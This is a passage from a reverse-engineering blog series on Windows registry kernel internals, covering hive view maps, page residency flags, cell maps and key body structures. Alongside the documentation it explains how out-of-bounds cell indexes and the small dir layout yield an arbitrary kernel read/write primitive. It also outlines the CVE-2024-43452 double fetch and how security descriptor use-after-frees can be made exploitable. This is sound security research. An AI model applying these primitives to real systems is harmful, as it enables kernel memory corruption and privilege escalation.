hive is currently being loaded or unloaded in another thread and shouldn't be accessed before the operation is complete.HIVE_COMPLETE_UNLOAD_STARTED: the unloading process of the hive has started in CmpCompleteUnloadKey.HIVE_ALL_REFS_DROPPED: all references to the hive through KCBs have been dropped.HIVE_ON_PRELOADED_LIST: the hive is linked into a linked-list via the PreloadedHiveList field.HIVE_FILE_READ_ONLY: the underlying hive file is read-only and shouldn't be modified; indicates that the hive was loaded with the REG_OPEN_READ_ONLY flag set.HIVE_SECTION_BACKED: the hive is mapped in memory using section views.HIVE_DIFFERENCING: the hive is a differencing one (version 1.6, loaded under \Registry\WC).HIVE_IMMUTABLE: the hive is immutable and cannot be modified; indicates that it was loaded with the REG_IMMUTABLE flag set.HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL: the kernel always maintains a local copy of every page of the hive, either by locking it in physical memory or creating a private copy through the CoW mechanism.Log file information Between offsets 0xA4 to 0xCC, there are a number of fields having to do with log file management, i.e. the .LOG1/.LOG2 files accompanying the main hive file on disk.Hive version The Version field stores the minor version of the hive, which should theoretically be an integer between 3–6. However, as mentioned in the previous blog post, it is possible to set it to an arbitrary 32-bit value either by specifying a major version equal to 0 and any desired minor version, or by enticing the kernel to recover the hive header from a log file, and abusing the fact that the HvAnalyzeLogFiles function is more permissive than HvpGetHiveHeader. Nevertheless, I haven't found any security implications of this behavior.View map The view map holds all the essential information about how the hive is mapped in memory. The specific implementation of registry memory management has evolved considerably over the years, with its details changing between consecutive system versions. In the latest ones, the view map is represented by the top-level _HVP_VIEW_MAP public structure: 0: kd> dt _HVP_VIEW_MAP nt!_HVP_VIEW_MAP    +0x000 SectionReference : Ptr64 Void    +0x008 StorageEndFileOffset : Int8B    +0x010 SectionEndFileOffset : Int8B    +0x018 ProcessTuple     : Ptr64 _CMSI_PROCESS_TUPLE    +0x020 Flags            : Uint4B    +0x028 ViewTree         : _RTL_RB_TREE The semantics of its respective fields are as follows: SectionReference: Contains a kernel-mode handle to a section object corresponding to the hive file, created via ZwCreateSection in CmSiCreateSectionForFile.StorageEndFileOffset: Stores the maximum size of the hive that can be represented with file-backed sections at any given time. Initially set to the size of the loaded hive, it can dynamically increase or decrease at runtime for mutable (normal) hives.SectionEndFileOffset: Represents the size of the hive file section at the time of loading. It is never modified past the first initialization in HvpViewMapStart, and seems to be mostly used as a safeguard against extending an immutable hive file beyond its original size.ProcessTuple: A structure of type _CMSI_PROCESS_TUPLE, it identifies the host process of the hive's section views. This field currently always points to the global CmpRegistryProcess object, which corresponds to the dedicated "Registry" process that hosts all hive mappings in the system. However, this field could enable a more fine-grained separation of hive mappings across multiple processes, should Microsoft choose to implement such a feature.Flags: Represents a set of memory management flags relevant to the entire hive. These flags are not publicly documented; however, through reverse engineering, I have determined their purpose to be as follows:VIEW_MAP_HIVE_FILE_IMMUTABLE (0x1): Indicates that the hive has been loaded as immutable, meaning no data is ever saved back to the underlying hive file.VIEW_MAP_MUST_BE_KEPT_LOCAL (0x2): Indicates that all of the hive data must be persistently stored in memory, and not just accessible through file-backed sections. This is likely to protect against double-fetch conditions involving hives loaded from remote network shares.VIEW_MAP_CONTAINS_LOCKED_PAGES (0x4): Indicates that some of the hive's pages are currently locked in physical memory using ZwLockVirtualMemory.ViewTree: This is the root of a view tree structure, which contains the descriptors of each continuous section view mapped in memory. Overall, the implementation of low-level hive memory management in Windows is more complex than might initially seem necessary. This complexity arises from the kernel's need to gracefully handle a variety of corner cases and interactions. For example, hives may be loaded as immutable, which indicates that the hive may be operated on in memory, but changes must not be flushed to disk. Simultaneously, the system must support recovering data from .LOG files, including the possibility of extending the hive beyond its original on-disk length. At runtime, it must also be possible to efficiently modify the registry data, as well as shrink and extend it on demand. To further complicate matters, Windows enforces different rules for locking hive pages in memory depending on the backing volume of the file, carefully balancing optimal memory usage and system security guarantees. These and many other factors collectively contribute to the complexity of hive memory management. To better understand how the view tree is organized, let's first analyze the general logic of the hive mapping code.The hive mapping logic The main kernel function responsible for mapping a hive in memory is HvLoadHive. It implements the overall logic and coordinates various sub-routines responsible for performing more specialized tasks, in the following order: Header Validation: The kernel reads and inspects the hive's header to ascertain its integrity, ensuring that the hive has not been tampered with or corrupted. Relevant function: HvpGetHiveHeader.Log Analysis: The kernel processes the hive's transaction logs, scrutinising them to identify any pending changes or inconsistencies that necessitate recovery procedures. Relevant function: HvAnalyzeLogFiles.Initial Section Mapping: A section object is created based on the hive file, and further segmented into multiple views, each aligned to 4 KiB boundaries and capped at 2 MiB. At this point, the kernel prioritizes the creation of an initial mapping without focusing on the granular layout of individual bins within the hive. Relevant function: HvpViewMapStart.Cell Map Initialization: The cell map, a component that translates cell indexes to memory address, is initialized. Its entries are configured to point to the newly created views. Relevant function: HvpMapHiveImageFromViewMap.Log Recovery (if required): If the preceding log analysis reveals the need for data recovery, the kernel attempts to restore data integrity. This is the earliest point at which the newly created memory mappings may already be modified and marked as "dirty", indicating that their contents have been altered and require synchronisation with the on-disk representation. Relevant function: HvpPerformLogFileRecovery.Bin Mapping: In this final stage, the kernel establishes definitive memory mappings for each bin within the hive, ensuring that each bin occupies a contiguous region of memory. This process may necessitate creating new views, eliminating existing ones, or adjusting their boundaries to accommodate the specific arrangement of bins. Relevant function: HvpRemapAndEnlistHiveBins. Now that we understand the primary components of the loading process, we can examine the internal structure of the section view tree in more detail.The view tree Let's consider an example hive consisting of three bins of sizes 256 KiB, 2 MiB and 128 KiB, respectively. After step 3 ("Initial Section Mapping"), the section views created by the kernel are as follows: As we can see, at this point, the kernel doesn't concern itself with bin boundaries or continuity: all it needs to achieve is to make every page of the hive accessible through a section view for log recovery purposes. In simple terms, the way that HvpViewMapStart (or more specifically, HvpViewMapCreateViewsForRegion) works is it creates as many 2 MiB views as necessary, followed by one last view that covers the remaining part of the file. So in our example, we have the first view that covers bin 1 and the beginning of bin 2, and the second view that covers the trailing part of bin 2 and the entire bin 3. It's important to note that memory continuity is only guaranteed within the scope of a single view, and views 1 and 2 may be mapped at completely different locations in the virtual address space. Later in step 6, the system ensures that every bin is mapped as a contiguous block of memory before handing off the hive to the client. This is done by iterating through all the bins, and for every bin that spans more than one view in the current view map, the following operations are performed: If the start and/or the end of the bin fall into the middle of existing views, these views are truncated from either side. Furthermore, if there are any views that are fully covered by the bin, they are freed and removed from the tree.A new, dedicated section view is created for the bin and inserted into the view tree. In our hypothetical scenario, the resulting view layout would be as follows: As we can see, the kernel shrinks views 1 and 2, and creates a new view 3 corresponding to bin 2 to fill the gap. The final layout of the binary tree of section view descriptors is illustrated below: Knowing this, we can finally examine the structure of a single view tree entry. It is not included in the public symbols, but I named it _HVP_VIEW. My reverse-engineered version of its definition is as follows: struct _HVP_VIEW {   RTL_BALANCED_NODE Node;   LARGE_INTEGER ViewStartOffset;   LARGE_INTEGER ViewEndOffset;   SSIZE_T ValidStartOffset;   SSIZE_T ValidEndOffset;   PBYTE MappingAddress;   SIZE_T LockedPageCount;   _HVP_VIEW_PAGE_FLAGS PageFlags[]; }; The role of each particular field is documented below: Node: This is the structure used to link all of the entries into a single red-black tree, passed to helper kernel functions such as RtlRbInsertNodeEx and RtlRbRemoveNode.ViewStartOffset and ViewEndOffset: This offset pair specifies the overall byte range covered by the underlying section view object in the hive file. Their difference corresponds to the cumulative length of the red and green boxes in a single row in the diagrams above.ValidStartOffset and ValidEndOffset: This offset pair specifies the valid range of the hive accessible through this view, i.e. the green rectangles in the diagrams. It must always be a subset of the [ViewStartOffset, ViewEndOffset] range, and may dynamically change while re-mapping bins (as just shown in this section), as well as when shrinking and extending the hive.MappingAddress: This is the base address of the section view mapping in memory, as returned by ZwMapViewOfSection. It is valid in the context of the process specified by _HVP_VIEW_MAP.ProcessTuple (currently always the "Registry" process). It covers the entire range between [ViewStartOffset, ViewEndOffset], but only pages between [ValidStartOffset, ValidEndOffset] are accessible, and the rest of the section view is marked as PAGE_NOACCESS.LockedPageCount: Specifies the number of pages locked in virtual memory using ZwLockVirtualMemory within this view.PageFlags: A variable-length array that specifies a set of flags for each memory page in the [ViewStartOffset, ViewEndOffset] range. I haven't found any (un)official sources documenting the set of supported page flags, so below is my attempt to name them and explain their meaning: Flag Value Description VIEW_PAGE_VALID 0x1 Indicates if the page is valid – true for pages between [ValidStartOffset, ValidEndOffset], false otherwise. If this flag is clear, all other flags are irrelevant/unused. The flag is set:When creating section views during hive loading, first the initial ones in HvpViewMapStart, and then the bin-specific ones in HvpRemapAndEnlistHiveBins.When extending an active hive in HvpViewMapExtendStorage. The flag is cleared:When trimming the existing views in HvpRemapAndEnlistHiveBins to make room for new ones.When shrinking the hive in HvpViewMapShrinkStorage. VIEW_PAGE_COW_BY_CALLER 0x2 Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as initiated by a client action, e.g. a registry operation that modified data in a cell and thus resulted in marking the page as dirty. The flag is set:When dirtying a hive cell, in HvpViewMapMakeViewRangeCOWByCaller. The flag is cleared:When flushing the registry changes to disk, in HvpViewMapMakeViewRangeUnCOWByCaller. VIEW_PAGE_COW_BY_POLICY 0x4 Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as required by the policy that all pages of non-local hives (hives loaded from volumes other than the system volume) must always remain in memory. The flag is set:In HvpViewMapMakeViewRangeValid, as an alternative way of keeping a local copy of the hive pages in memory (if locking fails, or the caller doesn't want the pages locked).In HvpViewMapMakeViewRangeCOWByCaller, when converting previously locked pages to the "CoW by policy" state.In HvpMappedViewConvertRegionFromLockedToCOWByPolicy, when lazily converting previously locked pages to the "CoW by policy" state in a thread that runs every 60 seconds (as indicated by CmpLazyLocalizeIntervalInSeconds). The flag is cleared:In HvpViewMapMakeViewRangeUnCOWByPolicy, which currently only ever seems to happen for hives loaded from the system volume, i.e. "\SystemRoot" and "\OSDataRoot", as listed in the global CmpWellKnownVolumeList array. VIEW_PAGE_WRITABLE 0x8 Indicates if the page is currently marked as writable, typically as a result of a modifying operation on the page that hasn't been yet flushed to disk. The flag is set:In HvpViewMapMakeViewRangeCOWByCaller, when marking a cell as dirty. The flag is cleared:In HvpViewMapMakeViewRangeUnCOWByCaller, when flushing the hive changes to disk.In HvpViewMapSealRange, when setting the memory as read-only for miscellaneous reasons (after performing log file recovery, etc.). VIEW_PAGE_LOCKED 0x10 Indicates if the page is currently locked in physical memory. The flag is set:In HvpViewMapMakeViewRangeValid if the caller requests page locking, and there is enough space left in the 64 MiB working set of the Registry process. In practice, this boils down to locking the initial 2 MiB hive mappings created in HvpViewMapStart for all app hives and for normal hives outside of the system disk volume. The flag is cleared:Whenever the state of the page changes to CoW-by-policy or Invalid in the following functions:HvpViewMapMakeViewRangeCOWByCallerHvpMappedViewConvertRegionFromLockedToCOWByPolicyHvpViewMapMakeViewRangeUnCOWByPolicyHvpViewMapMakeViewRangeInvalid The semantics of most of the flags are straightforward, but perhaps VIEW_PAGE_COW_BY_POLICY and VIEW_PAGE_LOCKED warrant a slightly longer explanation. The two flags are mutually exclusive, and they represent nearly identical ways to achieve the same goal: ensure that a copy of each hive page remains resident in memory or a pagefile. Under normal circumstances, the kernel could simply create the necessary section views in their default form, and let the memory management subsystem decide how to handle their pages most efficiently. However, one of the guarantees of the registry is that once a hive has been loaded, it must remain operational for as long as it is active in the system. On the other hand, section views have the property that (parts of) their underlying data may be completely evicted by the kernel, and later re-read from the original storage medium such as the hard drive. So, it is possible to imagine a situation where:A hive is loaded from a removable drive (e.g. a CD-ROM or flash drive) or a network share,Due to high memory pressure from other applications, some of the hive pages are evicted from memory,The removable drive with the hive file is ejected from the system,A client subsequently tries to operate on the hive, but parts of it are unavailable and cannot be fetched again from the original source. This could cause some significant problems and make the registry code fail in unexpected ways. It would also constitute a security vulnerability: the kernel assumes that once it has opened and sanitized the hive file, its contents remain consistent for as long as the hive is used. This is achieved by opening the file with exclusive access, but if the hive data was ever re-read by the Windows memory manager, a malicious removable drive or an attacker-controlled network share could ignore the exclusivity request and provide different, invalid data on the second read. This would result in a kind of "double fetch" condition and potentially lead to kernel memory corruption. To address both the reliability and security concerns, Windows makes sure to never evict pages corresponding to hives for which exclusive access cannot be guaranteed. This covers hives loaded from a location other than the system volume, and since Windows 10 19H1, also all app hives regardless of the file location. The first way to achieve this is by locking the pages directly in physical memory with a ZwLockVirtualMemory call. It is used for the initial ≤ 2 MiB section views created while loading a hive, up to the working set limit of the Registry process currently set at 64 MiB. The second way is by taking advantage of the copy-on-write mechanism – that is, marking the relevant pages as PAGE_WRITECOPY and subsequently touching each of them using the HvpViewMapTouchPages helper function. This causes the memory manager to create a private copy of each memory page containing the same data as the original, thus preventing them from ever being unavailable for registry operations. Between the two types of resident pages, the CoW type effectively becomes the default option in the long term. Eventually most pages converge to this state, even if they initially start as locked. This is because locked pages transition to CoW on multiple occasions, e.g. when converted by the background CmpDoLocalizeNextHive thread that runs every 60 seconds, or during the modification of a cell. On the other hand, once a page transitions to the CoW state, it never reverts to being locked. A diagram illustrating the transitions between the page residence states in a hive loaded from removable/remote storage is shown below: For normal hives loaded from the system volume (i.e. without the VIEW_MAP_MUST_BE_KEPT_LOCAL flag set), the state machine is much simpler: As a side note, CVE-2024-43452 was an interesting bug that exploited a flaw in the page residency protection logic. The bug arose because some data wasn't guaranteed to be resident in memory and could be fetched twice from a remote SMB share during bin mapping. This occurred early in the hive loading process, before page residency protections were fully in place. The kernel trusted the data from the second read without re-validation, allowing it to be maliciously set to invalid values, resulting in kernel memory corruption.Cell maps As discussed in Part 5, almost every cell contains references to other cells in the hive in the form of cell indexes. Consequently, virtually every registry operation involves multiple rounds of translating cell indexes into their corresponding virtual addresses in order to traverse the registry structure. Section views are stored in a red-black tree, so the search complexity is O(log n). This may seem decent, but if we consider that on a typical system, the registry is read much more often than it is extended/shrunk, it becomes apparent that it makes sense to further optimize the search operation at the cost of a less efficient insertion/deletion. And this is exactly what cell maps are: a way of trading a faster search complexity of O(1) for slower insertion/deletion complexity of O(n) instead of O(log n). Thanks to this technique, HvpGetCellPaged – perhaps the hottest function in the Windows registry implementation – executes in constant time. In technical terms, cell maps are pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers consisting of so-called directories, tables, and entries. As a reminder, the layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry: Given the nature of the data structure, the corresponding cell map walk involves dereferencing three nested arrays based on the subsequent 1, 10 and 9-bit parts of the cell index, and then adding the final 12-bit offset to the page-aligned address of the target block. The internal kernel structures matching the respective layers of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, all publicly accessible via the ntoskrnl.exe PDB symbols. The entry point to the cell map is the Storage array at the end of the _HHIVE structure: 0: kd> dt _HHIVE nt!_HHIVE [...]    +0x118 Storage          : [2] _DUAL The index into the two-element array represents the storage type, 0 for stable and 1 for volatile, so a single _DUAL structure describes a 2 GiB view of a specific storage space: 0: kd> dt _DUAL nt!_DUAL    +0x000 Length           : Uint4B    +0x008 Map              : Ptr64 _HMAP_DIRECTORY    +0x010 SmallDir         : Ptr64 _HMAP_TABLE    +0x018 Guard            : Uint4B    +0x020 FreeDisplay      : [24] _FREE_DISPLAY    +0x260 FreeBins         : _LIST_ENTRY    +0x270 FreeSummary      : Uint4B Let's examine the semantics of each field: Length: Expresses the current length of the given storage space in bytes. Directly after loading the hive, the stable length is equal to the size of the hive on disk (including any data recovered from log files, minus the 4096 bytes of the header), and the volatile space is empty by definition. Only cell map entries within the [0, Length - 1] range are guaranteed to be valid.Map: Points to the actual directory structure represented by _HMAP_DIRECTORY.SmallDir: Part of the "small dir" optimization, discussed in the next section.Guard: Its specific role is unclear, as the field is always initialized to 0xFFFFFFFF upon allocation and never used afterwards. I expect that it is some kind of debugging remnant from the early days of the registry development, presumably related to the small dir optimization.FreeDisplay: A data structure used to optimize searches for free cells during the cell allocation process. It consists of 24 buckets, each corresponding to a specific cell size range and represented by the _FREE_DISPLAY structure, indicating which pages in the hive may potentially contain free cells of the given length.FreeBins: The head of a doubly-linked list that links the descriptors of entirely empty bins in the hive, represented by the _FREE_HBIN structures.FreeSummary: A bitmask indicating which buckets within FreeDisplay have any hints set for the given cell size. A zero bit at a given position means that there are no free cells of the specific size range anywhere in the hive. The next level in the cell map hierarchy is the _HMAP_DIRECTORY structure: 0: kd> dt _HMAP_DIRECTORY nt!_HMAP_DIRECTORY    +0x000 Directory        : [1024] Ptr64 _HMAP_TABLE As we can see, it is simply a 1024-element array of pointers to _HMAP_TABLE: 0: kd> dt _HMAP_TABLE nt!_HMAP_TABLE    +0x000 Table            : [512] _HMAP_ENTRY Further, we get a 512-element array of pointers to the final level of the cell map, _HMAP_ENTRY: 0: kd> dt _HMAP_ENTRY nt!_HMAP_ENTRY    +0x000 BlockOffset      : Uint8B    +0x008 PermanentBinAddress : Uint8B    +0x010 MemAlloc         : Uint4B This last level contains a descriptor of a single page in the hive and warrants a deeper analysis. Let's start by noting that the four least significant bits of PermanentBinAddress correspond to a set of undocumented flags that control various aspects of the page behavior. I was able to reverse-engineer them and partially recover their names, largely thanks to the fact that some older Windows 10 builds contained non-inlined functions operating on these flags, with revealing names like HvpMapEntryIsDiscardable or HvpMapEntryIsTrimmed: enum _MAP_ENTRY_FLAGS {   MAP_ENTRY_NEW_ALLOC   = 0x1,   MAP_ENTRY_DISCARDABLE = 0x2,   MAP_ENTRY_TRIMMED     = 0x4,   MAP_ENTRY_DUMMY       = 0x8, }; Here's a brief summary of their meaning based on my understanding: MAP_ENTRY_NEW_ALLOC: Indicates that this is the first page of a bin. Cell indexes pointing into this page must specify an offset within the range of [0x20, 0xFFF], as they cannot fall into the first 32 bytes that correspond to the _HBIN structure.MAP_ENTRY_DISCARDABLE: Indicates that the whole bin is empty and consists of a single free cell.MAP_ENTRY_TRIMMED: Indicates that the page has been marked as "trimmed" in HvTrimHive. More specifically, this property is related to hive reorganization, and is set during the loading process on some number of trailing pages that only contain keys accessed during boot, or not accessed at all since the last reorganization. The overarching goal is likely to prevent introducing unnecessary fragmentation in the hive by avoiding mixing together keys with different access histories.MAP_ENTRY_DUMMY: Indicates that the page is allocated from the kernel pool and isn't part of a section view. With this in mind, let's dive into the details of each _HMAP_ENTRY structure member: PermanentBinAddress: The lower 4 bits contain the above flags. The upper 60 bits represent the base address of the bin mapping corresponding to this page.BlockOffset: This field has a dual functionality. If the MAP_ENTRY_DISCARDABLE flag is set, it is a pointer to a descriptor of a free bin, _FREE_HBIN, linked into the _DUAL.FreeBins linked list. If it is clear (the typical case), it expresses the offset of the page relative to the start of the bin. Therefore, the virtual address of the block's data in memory can be calculated as (PermanentBinAddress & (~0xF)) + BlockOffset.MemAlloc: If the MAP_ENTRY_NEW_ALLOC flag is set, it contains the size of the bin, otherwise it is zero. And this concludes the description of how cell maps are structured. Taking all of it into account, the implementation of the HvpGetCellPaged function starts to make a lot of sense. Its pseudocode comes down to the following: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map                             ->Directory[(Index >> 21) & 0x3FF]                             ->Table[(Index >> 12) & 0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; } The same process is followed, for example, by the implementation of the WinDbg !reg cellindex extension, which also translates a pair of a hive pointer and a cell index into the virtual address of the cell.The small dir optimization There is one other implementation detail about the cell maps worth mentioning here – the small dir optimization. Let's start with the observation that a majority of registry hives in Windows are relatively small, below 2 MiB in size. This can be easily verified by using the !reg hivelist command in WinDbg, and taking note of the values in the "Stable Length" and "Volatile Length" columns. Most of them usually contain values between several kilobytes to hundreds of kilobytes. This would mean that if the kernel allocated the full first-level directory for these hives (taking up 1024 entries × 8 bytes = 8 KiB on 64-bit platforms), they would still only use the first element in it, leading to a non-trivial waste of memory – especially in the context of the early 1990's when the registry was first implemented. In order to optimize this common scenario, Windows developers employed an unconventional approach to simulate a 1-item long "array" with the SmallDir member of type _HMAP_TABLE in the _DUAL structure, and have the _DUAL.Map pointer point at it instead of a separate pool allocation when possible. Later, whenever the hive grows and requires more than one element of the cell map directory, the kernel falls back to the standard behavior and performs a normal pool allocation for the directory array. A revised diagram illustrating the cell map layout of a small hive is shown below: Here, we can see that indexes 1 through 1023 of the directory array are invalid. Instead of correctly initialized _HMAP_TABLE structures, they point into "random" data corresponding to other members of the _DUAL and the larger _CMHIVE structure that happen to be located after _DUAL.SmallDir. Ordinarily, this is merely a low-level detail that doesn't have any meaningful implications, as all actively loaded hives remain internally consistent and always contain cell indexes that remain within the bounds of the hive's storage space. However, if we look at it through the security lens of hive-based memory corruption, this behavior suddenly becomes very interesting. If an attacker was able to implant an out-of-bounds cell index with the directory index greater than 0 into a hive, they would be able to get the kernel to operate on invalid (but deterministic) data as part of the cell map walk, and enable a powerful arbitrary read/write primitive. In addition to the small dir optimization, this technique is also enabled by the fact that the HvpGetCellPaged routine doesn't perform any bounds checks of the cell indexes, instead blindly trusting that they are always valid. If you are curious to learn more about the exploitation aspect of out-of-bounds cell indexes, it was the main subject of my Practical Exploitation of Registry Vulnerabilities in the Windows Kernel talk given at OffensiveCon 2024 (slides and video recording are available). I will also discuss it in more detail in one of the future blog posts focused specifically on the security impact of registry vulnerabilities._CMHIVE structure overview Beyond the first member of type _HHIVE at offset 0, the _CMHIVE structure contains more than 3 KiB of further information describing an active hive. This data relates to concepts more abstract than memory management, such as the registry tree structure itself. Below, instead of a field-by-field analysis, we'll focus on the general categories of information within _CMHIVE, organized loosely by increasing complexity of the data structures: Reference count: a 32-bit refcount primarily used during short-term operations on the hive, to prevent the object from being freed while actively operated on. These are used by the thin wrappers CmpReferenceHive and CmpDereferenceHive.File handles and sizes: handles and current sizes of the hive files on disk, such as the main hive file (.DAT) and the accompanying log files (.LOG, .LOG1, .LOG2). The handles are stored in FileHandles array, and the sizes reside in ActualFileSize and LogFileSizes.Text strings: some informational strings that may prove useful when trying to identify a hive based on its _CMHIVE structure. For example, the hive file name is stored in FileUserName, and the hive mount point path is stored in HiveRootPath.Timestamps: there are several timestamps that can be found in the hive descriptor, such as DirtyTime, UnreconciledTime or LastWriteTime.List entries: instances of the _LIST_ENTRY structure used to link the hive into various double-linked lists, such as the global list of hives in the system (HiveList, starting at nt!CmpHiveListHead), or the list of hives within a common trust class (TrustClassEntry).Synchronization mechanisms: various objects used to synchronize access to the hive as a whole, or some of its parts. Examples include HiveRundown, SecurityLock and HandleClosePendingEvent.Unload history: a 128-element array that stores the number of steps that have been successfully completed in the process of unloading the hive. Its specific purpose is unclear, it might be a debugging artifact retained from older versions of Windows.Late unload state: objects related to deferred unloading of registry hives (LateUnloadWorkItemState, LateUnloadFinishedEvent, LateUnloadWorkItem).Hive layout information: the hive reorganization process in Windows tries to optimize hives by grouping together keys accessed during system runtime, followed by keys accessed during system boot, followed by completely unused keys. If a hive is structured according to this order during load, the kernel saves information about the boundaries between the three distinct areas in the BootStart, UnaccessedStart and UnaccessedEnd members of _CMHIVE.Flushing state and dirty block information: any state that has to do with marking cells as dirty and synchronizing their contents to disk. There are a significant number of fields related to the functionality, with names starting with "Flush...", "Unreconciled..." and "CapturedUnreconciled...".Volume context: a pointer to a public _CMP_VOLUME_CONTEXT structure, which provides extended information about the disk volume of the hive file. As an example, it is used in the internal CmpVolumeContextMustHiveFilePagesBeKeptLocal routine to determine whether the volume is a system one, and consequently whether certain security/reliability assumptions are guaranteed for it or not.KCB table and root KCB: a table of the globally visible KCB (Key Control Block) structures corresponding to keys in the hive, and a pointer to the root key's KCB. I will discuss KCBs in more detail in the "Key structures" section below.Security descriptor cache: a cache of all security descriptors present in the hive, allocated from the kernel pool and thus accessible more efficiently than the underlying hive mappings. In my bug reports, I have often taken advantage of the security cache as a straightforward way to demonstrate the exploitability of security descriptor use-after-frees. A security node UAF can be easily converted into an UAF of its pool-based cached object, which then reliably triggers a Blue Screen of Death when Special Pool is enabled. The security cache of any given hive can be enumerated using the !reg seccache command in WinDbg.Transaction-related objects: a pointer to a _CM_RM structure that describes the Resource Manager object associated with the hive, if "heavyweight" transactions (i.e. KTM transactions) are enabled for it. Last but not least, _CMHIVE has its own Flags field that is different from _HHIVE.Flags. As usual, the flags are not documented, so the listing below is a product of my own analysis: enum _CM_HIVE_FLAGS {   CM_HIVE_UNTRUSTED                 = 0x1,   CM_HIVE_IN_SID_MAPPING_TABLE      = 0x2,   CM_HIVE_HAS_RM                    = 0x8,   CM_HIVE_IS_VIRTUALIZABLE          = 0x10,   CM_HIVE_APP_HIVE                  = 0x20,   CM_HIVE_PROCESS_PRIVATE           = 0x40,   CM_HIVE_MUST_BE_REORGANIZED       = 0x400,   CM_HIVE_DIFFERENCING_WRITETHROUGH = 0x2000,   CM_HIVE_CLOUDFILTER_PROTECTED     = 0x10000, }; A brief description of each of them is as follows:CM_HIVE_UNTRUSTED: the hive is "untrusted" in the sense of registry symbolic links; in other words, it is not one of the default system hives loaded on boot. The distinction is that trusted hives can freely link to all other hives in the system, while untrusted ones can only link to hives within their so-called trust class. This is to prevent confused deputy-style privilege escalation attacks in the system.CM_HIVE_IN_SID_MAPPING_TABLE: the hive is linked into an internal data structure called the "SID mapping table" (nt!CmpSIDToHiveMapping), used to efficiently look up the user class hives mounted at \Registry\User\_Classes for the purposes of registry virtualization. CM_HIVE_HAS_RM: KTM transactions are enabled for this hive, meaning that the corresponding .blf and .regtrans-ms files are present in the same directory as the main hive file. The flag is clear if the hive is an app hive or if it was loaded with the REG_HIVE_NO_RM flag set.CM_HIVE_IS_VIRTUALIZABLE: accesses to this hive may be subject to registry virtualization. As far as I know, the only hive with this flag set is currently HKLM\SOFTWARE, which seems in line with the official documentation.CM_HIVE_APP_HIVE: this is an app hive, i.e. it was loaded under \Registry\A with the REG_APP_HIVE flag set.CM_HIVE_PROCESS_PRIVATE: this hive is private to the loading process, i.e. it was loaded with the REG_PROCESS_PRIVATE flag set.CM_HIVE_MUST_BE_REORGANIZED: the hive fragmentation threshold (by default 1 MiB) has been exceeded, and the hive should undergo the reorganization process at the next opportunity. The flag is simply a means of communication between the CmCheckRegistry and CmpReorganizeHive internal routines, both of which execute during hive loading.CM_HIVE_DIFFERENCING_WRITETHROUGH: this is a delta hive loaded in the writethrough mode, which technically means that the DIFF_HIVE_WRITETHROUGH flag was specified in the DiffHiveFlags member of the VRP_LOAD_DIFFERENCING_HIVE_INPUT structure, as discussed in Part 4.CM_HIVE_CLOUDFILTER_PROTECTED: new flag added in December 2024 as part of the fix for CVE-2024-49114. It indicates that the hive file has been protected against being converted to a Cloud Filter placeholder by setting the "$Kernel.CFDoNotConvert" extended attribute (EA) on the file in CmpAdjustFileCFSafety. This concludes the documentation of the hive descriptor structure, arguably the largest and most complex object in the Windows registry implementation. Key structures The second most important objects in the registry are keys. They can be basically thought of as the essence of the registry, as nearly every registry operation involves them in some way. They are also the one and only registry element that is tightly integrated with the Windows NT Object Manager. This comes with many benefits, as client applications can operate on the registry using standardized handles, and can leverage automatic security checks and object lifetime management. However, this integration also presents its own challenges, as it requires the Configuration Manager to interact with the Object Manager correctly and handle its intricacies and edge cases securely. For this reason, internal key-related structures play a crucial role in the registry implementation. They help organize key state in a way that simplifies keeping it up-to-date and internally consistent. For security researchers, understanding these structures and their semantics is invaluable. This knowledge enables you to quickly identify bugs in existing code or uncover missing handling of unusual but realistic conditions. The two fundamental key structures in the Windows kernel are the key body (_CM_KEY_BODY) and key control block (_CM_KEY_CONTROL_BLOCK). The key body is directly associated with a key handle in the NT Object Manager, similar to the role that the _FILE_OBJECT structure plays for file handles. In other words, this is the initial object that the kernel obtains whenever it calls ObReferenceObjectByHandle to reference a user-supplied handle. There may concurrently exist a number of key body structures associated with a single key, as long as there are several programs holding active handles to the key. Conversely, the key control block represents the global state of a specific key and is used to manage its general properties. This means that for most keys in the system, there is at most one KCB allocated at a time. There may be no KCB for keys that haven't been accessed yet (as they are initialized by the kernel lazily), and there may be more than one KCB for the same registry path if the key has been deleted and created again (these two instances of the key are treated as separate entities, with one of them being marked as deleted/non-existent). Taking this into account, the relationship between key bodies and KCBs is many-to-one, with all of the key bodies of a single KCB being connected in a doubly-linked list, as shown in the diagram below: The following subsections provide more detail about each of these two structures.Key body The key body structure is allocated and initialized in the internal CmpCreateKeyBody routine, and freed by the NT Object Manager when all references to the object are dropped. It is a relatively short and simple object with the following definition: 0: kd> dt _CM_KEY_BODY nt!_CM_KEY_BODY    +0x000 Type             : Uint4B    +0x004 AccessCheckedLayerHeight : Uint2B    +0x008 KeyControlBlock  : Ptr64 _CM_KEY_CONTROL_BLOCK    +0x010 NotifyBlock      : Ptr64 _CM_NOTIFY_BLOCK    +0x018 ProcessID        : Ptr64 Void    +0x020 KeyBodyList      : _LIST_ENTRY    +0x030 Flags            : Pos 0, 16 Bits    +0x030 HandleTags       : Pos 16, 16 Bits    +0x038 Trans            : _CM_TRANS_PTR    +0x040 KtmUow           : Ptr64 _GUID    +0x048 ContextListHead  : _LIST_ENTRY    +0x058 EnumerationResumeContext : Ptr64 Void    +0x060 RestrictedAccessMask : Uint4B    +0x064 LastSearchedIndex : Uint4B    +0x068 LockedMemoryMdls : Ptr64 Void Let's quickly go over each field:Type: for normal keys (i.e. almost all of them), this field is set to a magic value of 0x6B793032 ('ky02'). However, for predefined keys, this is the 32-bit value of the link's target key with the highest bit set. This member is therefore used to distinguish between regular keys and predefined ones, for example in CmObReferenceObjectByHandle. Predefined keys have been now largely deprecated, but it is still possible to observe a non-standard Type value by opening a handle to one of the two last remaining ones: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 and CurrentLanguage under the same path.AccessCheckedLayerHeight: a new field added in November 2023 as part of the fix for CVE-2023-36404. It is used for layered keys and contains the index of the 